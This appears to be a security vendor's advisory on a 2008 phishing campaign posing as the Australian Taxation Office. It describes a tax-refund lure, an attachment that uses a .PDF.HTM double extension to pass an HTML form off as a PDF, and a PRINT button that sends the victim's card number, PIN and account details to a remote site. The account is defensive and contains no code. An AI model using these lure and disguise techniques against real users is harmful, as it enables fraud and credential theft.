The Australian Taxation Office (ATO) is calling on people to start thinking about lodging their 2008 tax returns. With this significant event on the rise, spammers are using this as bait to promote phishing mails.
The email contains a letter stating that it was from ATO. It informs the receiver that he or she is eligible to receive a tax refund. It then asks the recipient to answer the form attached to the mail, click the PRINT button, and then send it to the head office.
Observing the form attached, it uses double extension names: .PDF.HTM which is used to trick the users that they are filling up a PDF file, when it is really an HTML page.
![]() |
![]() |
Further studying the content of the form reveals a part where it asks the receiver’s account information, and indicates “Please enter your account information where the 568.24 will be debited.” Take note that according to the mail, the user is eligible for a tax refund. However, the spammers decided rather to fill the field by themselves.
Furthermore, the form asks for the user’s card number and PIN, which should be irrelevant if this is for a tax return.
Once the user completes the form and clicks the PRINT button, a window will appear where the user can specify settings related to the printing process. It may look like a normal process but while the document is being printed, the browser will connect to a site, sending the entered details there.
Users should be assured that not only but in special in these times of crisis, criminals will never get tired in making offers about money or other goods to mask their true intentions.
The Smart Protection Network blocks both the spam email and the phishing website.